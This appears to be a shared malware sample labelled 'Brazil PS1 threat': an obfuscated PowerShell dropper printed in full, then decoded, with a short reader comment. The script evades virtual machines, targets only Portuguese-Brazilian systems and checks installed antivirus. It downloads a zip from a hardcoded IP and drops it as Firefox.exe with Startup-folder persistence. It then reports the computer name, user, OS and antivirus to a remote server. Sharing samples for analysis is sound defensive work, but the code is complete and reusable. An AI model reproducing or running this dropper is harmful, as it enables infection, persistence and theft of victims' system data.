Brazil PS1 threat

Brazil PS1 threat

## uploaded by @JohnLaTwC
## sample hash: 4ff21fd53f6ba8d2805574fe21b3a3470c5b719988ecdef59fed4b592c79a61c

function _/=\_____/==\/=\/\
{
  try
  {
    ${/=======\/=\_/\/=} = Get-Random -Minimum 5 -Maximum 9
    ${/=====\_/\/\_/\_/} = ""
    For (${_____/=\_/==\_/\/}=0; ${_____/=\_/==\_/\/} -le ${/=======\/=\_/\/=}; ${_____/=\_/==\_/\/}++) 
    {
      ${/=\__/==\/\/====\}  = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cQB3AGUAcgB0AHkAdQBpAG8AcABsAGsAagBoAGcAZgBkAHMAYQB6AHgAYwB2AGIAbgBtAFEAVwBFAFIAVABZAFUASQBPAFAAQQBTAEQARgBHAEgASgBLAEwAWgBYAEMAVgBCAE4ATQA=')))
      ${/===\/\_/====\_/=}  = Get-Random -Minimum 1 -Maximum ${/=\__/==\/\/====\}.Length
      ${/=\________/=\__/} = ${/=\__/==\/\/====\}.Substring(${/===\/\_/====\_/=},1)
      ${/=====\_/\/\_/\_/} = ${/=====\_/\/\_/\_/}+${/=\________/=\__/}   
    }
    return ${/=====\_/\/\_/\_/}  
  }
  finally{}
}
${/===\/\_/==\/=\__} = $env:LOCALAPPDATA
${_____/=\/\_/==\_/} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwAxADcANAAuADEAMgA3AC4AMQAyADAALgAzAC8AMQA5AC8AaQBuAGYALgBwAGgAcAA='))) + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('PwBwAGMAPQA=')))
${/=\/=\_/=\__/\/\_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwAxADcANAAuADEAMgA3AC4AMQAyADAALgAzAC8AMQA5AC8AMQA5ADAANAAuAHoAaQBwAA==')))
${_/===\/\/\__/===\} = ${/===\/\_/==\/=\__} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XABGAGkAcgBlAGYAbwB4AC4AZQB4AGUA')))
function ___________/===\__
{
  ${_/\/\___/=\_/===\} = gwmi -Class Win32_ComputerSystem |select -ExpandProperty Model
  if (${_/\/\___/=\_/===\} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbABCAG8AeAA='))) -or
    ${_/\/\___/=\_/===\} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBNAHcAYQByAGUAIABWAGkAcgB0AHUAYQBsACAAUABsAGEAdABmAG8AcgBtAA=='))) -or
    ${_/\/\___/=\_/===\} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUA'))) -or
  ${_/\/\___/=\_/===\} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABWAE0AIABkAG8AbQBVAA=='))))
  {
    return "Y"
  }
  else
  { 
    return "N"
  }
}
function ____________/===\_
{
  ${/\____/==\/==\/==} = gwmi -Class Win32_OperatingSystem
  ${/==\/\_/====\_/\/} = ${/\____/==\/==\/==}.MUILanguages
  return ${/==\/\_/====\_/\/}
}
function __/\/=\/\/\_/\/\_/
{
  Param([string]${________/\/=\/\___},[string]${_/==\___/====\___/});
  try
  {   
    ${_/\_/\/\_/\/=\/==} = new-object System.Net.WebClient;
    ${_/\_/\/\_/\/=\/==}.DownloadFile(${________/\/=\/\___},${_/==\___/====\___/}); 
    return "Y" 
  }finally{}
}
function _/====\_/=\/=\/\/\ { 
  [cmdletBinding()]     
  param ( 
    [string]${___/======\__/==\/} = "${env:___/======\__/==\/}" , 
    ${_/=\___/===\/\__/=} 
  ) 
  BEGIN  
  { 
    ${/=\/=\/=\/\______} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBFAEwARQBDAFQAIAAqACAARgBSAE8ATQAgAEEAbgB0AGkAVgBpAHIAdQBzAFAAcgBvAGQAdQBjAHQA'))) 
  } 
  PROCESS  
  {    
    ${/=\/\/\/=====\_/\} = gwmi -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cgBvAG8AdABcAFMAZQBjAHUAcgBpAHQAeQBDAGUAbgB0AGUAcgAyAA=='))) -Query ${/=\/=\/=\/\______}  @psboundparameters 
    return ${/=\/\/\/=====\_/\}.displayName
  } 
  END { 
  } 
} 
${__/=\/=\/\_/=\_/=} = "("+(gwmi -class Win32_OperatingSystem).Caption+")"
${/=\/\_/===\_/==\_} = "("+(gwmi -Class Win32_ComputerSystem -Property Name).Name + ")"
${_/\/\/=\_/=\/====} = "("+[Environment]::UserName+ ")"
${/===\_______/\___} = "("+(_/====\_/=\/=\/\/\)+ ")"
${_/=\/\/==\_/\/==\} = "("+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('NgA0ACAAQgBpAHQAcwA/ACAA'))) + [Environment]::Is64BitOperatingSystem+ ")"
${_/=\_/=\/\/\/\/=\} =  $env:LOCALAPPDATA + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XABDAGgAcgBvAG0AZQAuAHgAbQBsAA==')))
${/====\__/=\_/==\/} =  ${/===\/\_/==\/=\__} +"\"+ (_/=\_____/==\/=\/\) + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgB6AGkAcAA=')))
${___/\/\_/\/==\__/} = [Environment]::GetFolderPath($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AGEAcgB0AHUAcAA=')))) +"\"+ (_/=\_____/==\/=\/\) + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgBsAG4AawA=')))
function __/==\__/\/====\__
{
  ni -ItemType file -Path ${_/=\_/=\/\/\/\/=\} 
}
function ___/===\/\_/\__/\/
{
  ${__/====\____/\_/=} = New-Object system.Net.WebClient;
  ${__/====\____/\_/=}.downloadString($ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AF8AXwBfAF8AXwAvAD0AXAAvAFwAXwAvAD0APQBcAF8ALwB9ACQAewAvAD0AXAAvAFwAXwAvAD0APQA9AFwAXwAvAD0APQBcAF8AfQAmAG8AcwA9ACQAewBfAF8ALwA9AFwALwA9AFwALwBcAF8ALwA9AFwAXwAvAD0AfQAmAHUAcwBlAHIAPQAkAHsAXwAvAFwALwBcAC8APQBcAF8ALwA9AFwALwA9AD0APQA9AH0AJgBhAHYAPQAkAHsALwA9AD0APQBcAF8AXwBfAF8AXwBfAF8ALwBcAF8AXwBfAH0A'))))
}
function _/==\_/==\_/\/\/\_
{
  ni -ItemType Directory -Path ${/===\/\_/==\/=\__} 
}
function ___/\___/===\/\/==(${____/==\__/\/==\_/}, ${_/=\___/\/\/\_/==\})
{
  ${__/\_/\___/=\___/} = new-object -com shell.application
  ${____/==\_/===\/==} = ${__/\_/\___/=\___/}.NameSpace(${____/==\__/\/==\_/})
  foreach(${__/===\__/\/\_/=\} in ${____/==\_/===\/==}.items())
  {
    ${__/\_/\___/=\___/}.Namespace(${_/=\___/\/\/\_/==\}).copyhere(${__/===\__/\/\_/=\})
  }
}
function _/==\_______/=\/==
{
  Param([string]${_/\___________/===},[string]${__/====\___/\/=\_/});
  try{
    ${/=\_/\_/\_/==\__/} = New-Object -com $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAA='))) 
    ${__/\_/\/=\/=\____} = ${/=\_/\_/\_/==\__/}.CreateShortcut(${_/\___________/===})
    ${__/\_/\/=\/=\____}.TargetPath = $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AF8AXwAvAD0APQA9AD0AXABfAF8AXwAvAFwALwA9AFwAXwAvAH0A')))
    ${__/\_/\/=\/=\____}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXABzAHkAcwB0AGUAbQAzADIAXABTAEgARQBMAEwAMwAyAC4AZABsAGwALAAgADQAMQA=')))
    ${__/\_/\/=\/=\____}.Save()
  }finally{}
}
if (([System.IO.File]::Exists(${_/=\_/=\/\/\/\/=\})))
{
}
else
{
 if ((____________/===\_) -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cAB0AC0AQgBSAA=='))) -and (___________/===\__) -eq "N")
    {
      __/==\__/\/====\__
      _/==\_/==\_/\/\/\_
      __/\/=\/\/\_/\/\_/ -________/\/=\/\___ ${/=\/=\_/=\__/\/\_} -_/==\___/====\___/ ${/====\__/=\_/==\/}
      ___/\___/===\/\/== ${/====\__/=\_/==\/} ${/===\/\_/==\/=\__}
      _/==\_______/=\/== -_/\___________/=== ${___/\/\_/\/==\__/} -__/====\___/\/=\_/ ${_/===\/\/\__/===\}
      start-process ${_/===\/\/\__/===\}
      ___/===\/\_/\__/\/
    }
}

## decodes to:


 function _/=\_____/==\/=\/\
 {
   try
   {
     ${/=======\/=\_/\/=} = Get-Random -Minimum 5 -Maximum 9
     ${/=====\_/\/\_/\_/} = ""
     For (${_____/=\_/==\_/\/}=0; ${_____/=\_/==\_/\/} -le ${/=======\/=\_/\/=}; ${_____/=\_/==\_/\/}++) 
     {
       ${/=\__/==\/\/====\}  = $('qwertyuioplkjhgfdsazxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'))
       ${/===\/\_/====\_/=}  = Get-Random -Minimum 1 -Maximum ${/=\__/==\/\/====\}.Length
       ${/=\________/=\__/} = ${/=\__/==\/\/====\}.Substring(${/===\/\_/====\_/=},1)
       ${/=====\_/\/\_/\_/} = ${/=====\_/\/\_/\_/}+${/=\________/=\__/}   
     }
     return ${/=====\_/\/\_/\_/}  
   }
   finally{}
 }
 ${/===\/\_/==\/=\__} = $env:LOCALAPPDATA
 ${_____/=\/\_/==\_/} = $('http://174.127.120.3/19/inf.php')) + $('?pc='))
 ${/=\/=\_/=\__/\/\_} = $('http://174.127.120.3/19/1904.zip'))
 ${_/===\/\/\__/===\} = ${/===\/\_/==\/=\__} + $('\Firefox.exe'))
 function ___________/===\__
 {
   ${_/\/\___/=\_/===\} = gwmi -Class Win32_ComputerSystem |select -ExpandProperty Model
   if (${_/\/\___/=\_/===\} -eq $('VirtualBox')) -or
     ${_/\/\___/=\_/===\} -eq $('VMware Virtual Platform')) -or
     ${_/\/\___/=\_/===\} -eq $('Virtual Machine')) -or
   ${_/\/\___/=\_/===\} -eq $('HVM domU')))
   {
     return "Y"
   }
   else
   { 
     return "N"
   }
 }
 function ____________/===\_
 {
   ${/\____/==\/==\/==} = gwmi -Class Win32_OperatingSystem
   ${/==\/\_/====\_/\/} = ${/\____/==\/==\/==}.MUILanguages
   return ${/==\/\_/====\_/\/}
 }
 function __/\/=\/\/\_/\/\_/
 {
   Param([string]${________/\/=\/\___},[string]${_/==\___/====\___/});
   try
   {   
     ${_/\_/\/\_/\/=\/==} = new-object System.Net.WebClient;
     ${_/\_/\/\_/\/=\/==}.DownloadFile(${________/\/=\/\___},${_/==\___/====\___/}); 
     return "Y" 
   }finally{}
 }
 function _/====\_/=\/=\/\/\ { 
   [cmdletBinding()]     
   param ( 
     [string]${___/======\__/==\/} = "${env:___/======\__/==\/}" , 
     ${_/=\___/===\/\__/=} 
   ) 
   BEGIN  
   { 
     ${/=\/=\/=\/\______} = $('SELECT * FROM AntiVirusProduct')) 
   } 
   PROCESS  
   {    
     ${/=\/\/\/=====\_/\} = gwmi -Namespace $('root\SecurityCenter2')) -Query ${/=\/=\/=\/\______}  @psboundparameters 
     return ${/=\/\/\/=====\_/\}.displayName
   } 
   END { 
   } 
 } 
 ${__/=\/=\/\_/=\_/=} = "("+(gwmi -class Win32_OperatingSystem).Caption+")"
 ${/=\/\_/===\_/==\_} = "("+(gwmi -Class Win32_ComputerSystem -Property Name).Name + ")"
 ${_/\/\/=\_/=\/====} = "("+[Environment]::UserName+ ")"
 ${/===\_______/\___} = "("+(_/====\_/=\/=\/\/\)+ ")"
 ${_/=\/\/==\_/\/==\} = "("+$('64 Bits? ')) + [Environment]::Is64BitOperatingSystem+ ")"
 ${_/=\_/=\/\/\/\/=\} =  $env:LOCALAPPDATA + $('\Chrome.xml'))
 ${/====\__/=\_/==\/} =  ${/===\/\_/==\/=\__} +"\"+ (_/=\_____/==\/=\/\) + $('.zip'))
 ${___/\/\_/\/==\__/} = [Environment]::GetFolderPath($('Startup'))) +"\"+ (_/=\_____/==\/=\/\) + $('.lnk'))
 function __/==\__/\/====\__
 {
   ni -ItemType file -Path ${_/=\_/=\/\/\/\/=\} 
 }
 function ___/===\/\_/\__/\/
 {
   ${__/====\____/\_/=} = New-Object system.Net.WebClient;
   ${__/====\____/\_/=}.downloadString($ExecutionContext.InvokeCommand.ExpandString('${_____/=\/\_/==\_/}${/=\/\_/===\_/==\_}&os=${__/=\/=\/\_/=\_/=}&user=${_/\/\/=\_/=\/====}&av=${/===\_______/\___}')))
 }
 function _/==\_/==\_/\/\/\_
 {
   ni -ItemType Directory -Path ${/===\/\_/==\/=\__} 
 }
 function ___/\___/===\/\/==(${____/==\__/\/==\_/}, ${_/=\___/\/\/\_/==\})
 {
   ${__/\_/\___/=\___/} = new-object -com shell.application
   ${____/==\_/===\/==} = ${__/\_/\___/=\___/}.NameSpace(${____/==\__/\/==\_/})
   foreach(${__/===\__/\/\_/=\} in ${____/==\_/===\/==}.items())
   {
     ${__/\_/\___/=\___/}.Namespace(${_/=\___/\/\/\_/==\}).copyhere(${__/===\__/\/\_/=\})
   }
 }
 function _/==\_______/=\/==
 {
   Param([string]${_/\___________/===},[string]${__/====\___/\/=\_/});
   try{
     ${/=\_/\_/\_/==\__/} = New-Object -com $('WScript.Shell')) 
     ${__/\_/\/=\/=\____} = ${/=\_/\_/\_/==\__/}.CreateShortcut(${_/\___________/===})
     ${__/\_/\/=\/=\____}.TargetPath = $ExecutionContext.InvokeCommand.ExpandString('${__/====\___/\/=\_/}'))
     ${__/\_/\/=\/=\____}.IconLocation = $('%SystemRoot%\system32\SHELL32.dll, 41'))
     ${__/\_/\/=\/=\____}.Save()
   }finally{}
 }
 if (([System.IO.File]::Exists(${_/=\_/=\/\/\/\/=\})))
 {
 }
 else
 {
  if ((____________/===\_) -eq $('pt-BR')) -and (___________/===\__) -eq "N")
     {
       __/==\__/\/====\__
       _/==\_/==\_/\/\/\_
       __/\/=\/\/\_/\/\_/ -________/\/=\/\___ ${/=\/=\_/=\__/\/\_} -_/==\___/====\___/ ${/====\__/=\_/==\/}
       ___/\___/===\/\/== ${/====\__/=\_/==\/} ${/===\/\_/==\/=\__}
       _/==\_______/=\/== -_/\___________/=== ${___/\/\_/\/==\__/} -__/====\___/\/=\_/ ${_/===\/\/\__/===\}
       start-process ${_/===\/\/\__/===\}
       ___/===\/\_/\__/\/
     }
 }

I've found something interesting. I'm not a powershell specialist but it seems to try to get information from Microsoft Outlook: https://gist.github.com/msmarcal/5255423dd964f96cb65c67a0b2c210b2